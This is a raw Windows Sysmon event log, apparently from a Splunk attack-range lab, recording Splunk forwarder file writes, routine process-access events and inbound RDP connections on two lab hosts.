Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C0CBF1DA2B2F02FC453E7B3DE7BFF9B,SHA256=0FEBDC7225DEF0940EBCCBD8C46EC2CB55D450305C85626D6E4E7706A39E21EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976596Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:34.233{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FE23E94AA70004DB7E7356E0261778B,SHA256=843373379A5E599F69E13EEB61D39D6961C0E51BCFD3B0117313E900B99177A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047998Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:34.619{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8378C2FB2155646F1CBE75C6267FFF40,SHA256=13AF4E6C4F2D111D8ABD82F79F6ABD94BF95B5313CB1A4EA6DFA68BD7FB7FE29,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047997Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:32.213{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-57023-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048000Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:35.934{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72A30631206CE8CC7BDDD8A236DF96AB,SHA256=824041F313B39CCF77EA17F4C83996E99956132E3B4C4DC09C64CFCFBB8BFB65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976599Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:35.764{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=102F9E25F00C6B4AC7FCEBEA8D0CEFEE,SHA256=F0E439E4BFBB8A50D39CE8FFB89BC0DD5E21CEF665D236CAC661D185EEC00E35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976598Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:35.468{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1197B24B4EE1548F2C4D7B6049C23665,SHA256=8B9E67B53A45B4259C69434055A15464EE0121E31EBA4B2E2367960F9498240B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976597Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:31.555{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-32385-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001048003Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:36.935{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D5FF48B01967F888FCF9F472C69DD55,SHA256=301D5B788D3AFC8104D182055DDE4B181BD93489BA800CEBBB55AE5171978FBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976601Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:36.514{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFE8CF424FB464A452D404E79561BE70,SHA256=C5AACAEFDA0FCF6213DDAD69051EE0EC84B9A3295DA5FCCB724565B20593D410,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048002Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:33.924{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-61030-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048001Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:36.403{5EBD8912-7F40-614D-2900-00000000FC01}2964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976600Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:32.924{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-58203-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001048005Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:37.951{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53FAA9A74DCE6121D1CC27C167DB3007,SHA256=1D47BCEEB010FAEF6B189B234C62EB058F1E84F3B6FD5681BEEBCA1358D28D22,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000976615Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:37.749{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8871-6151-8079-00000000FD01}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976614Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:37.749{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976613Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:37.749{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976612Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:37.749{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976611Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:37.749{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976610Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:37.749{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976609Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:37.749{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976608Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:37.749{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976607Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:37.749{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976606Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:37.749{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976605Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:37.749{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8871-6151-8079-00000000FD01}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000976604Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:37.749{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8871-6151-8079-00000000FD01}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000976603Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:37.734{69CF5F33-8871-6151-8079-00000000FD01}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000976602Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:37.671{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28AC669571B3940F15A63445F1664E7A,SHA256=797D2CC951A7CB2B385F0199C987D59648B513DC05F33F3F214EF59CFFC04F81,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048004Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:35.795{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49224-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048007Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:38.968{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E78219CE3B050DDD592BB1E3E5BFDEFA,SHA256=FAEE751C763C04C668100C74416DB557030CCB82EC1B32829D28DD17258DBC89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976619Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:38.749{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE2DE7C47B01B7BB2E3206A16470904F,SHA256=11262D1170709C6D7B85135DAB49BE8150B9C709B27C37C100BCBF6ED46D0CBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976618Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:38.749{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A3A1A7B068979023F0AE2A9C508B862C,SHA256=7BCF743F80F402C8CA77F8D3494620218F728FB317F06FC6C1A9FA0EE0013802,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048006Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:36.079{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49225-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x8000000000000000976617Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:35.830{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59261-false10.0.1.12-8000- 354300x8000000000000000976616Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:35.731{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-4103-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976620Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:39.983{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=591209A3B8E9C3352BE7C8634404E44F,SHA256=372630F1076F1D7C1EC46EAD7DFBB42FDCC23E671E39CE8EA2BEE4352AE3F706,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048008Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:39.169{5EBD8912-7F30-614D-1200-00000000FC01}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=07E31491B3B67E0F5EAE3EDCAD81EEC8,SHA256=7C7D698B85BE19EF3B3A7D8E279776ED888609741348598E156170F95F1C18C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976622Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:40.655{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=43A7308E2FD088CC40C1063DDC949380,SHA256=E17B5B452FCB53B04177D19E145FF76A4DE52063D1CFBF17C226206AC0B8BCA5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976621Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:37.805{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-61363-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001048009Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:40.005{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88B471820ED4EE707A00799E9A805CE8,SHA256=09F845C9C33489AB534A14EB99788F6ACF0D267D31BD2CBE7AF30601D507E196,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976624Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:38.706{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-15610-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976623Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:41.186{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE2022581AE13E596FF272D2544672EE,SHA256=EB738AC82259E60897828CF20A8BC30594EB72A6108F2E3151166E456E916863,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048012Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:41.904{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5410CB9E95C94077BA1AEE37D65FDDE8,SHA256=A7D235BD4F1C84FBEDC2F6A1DDD732662DD09377DD32FCA0E3241BB4063B6A87,IMPHASH=00000000000000000000000000000000falsetrue 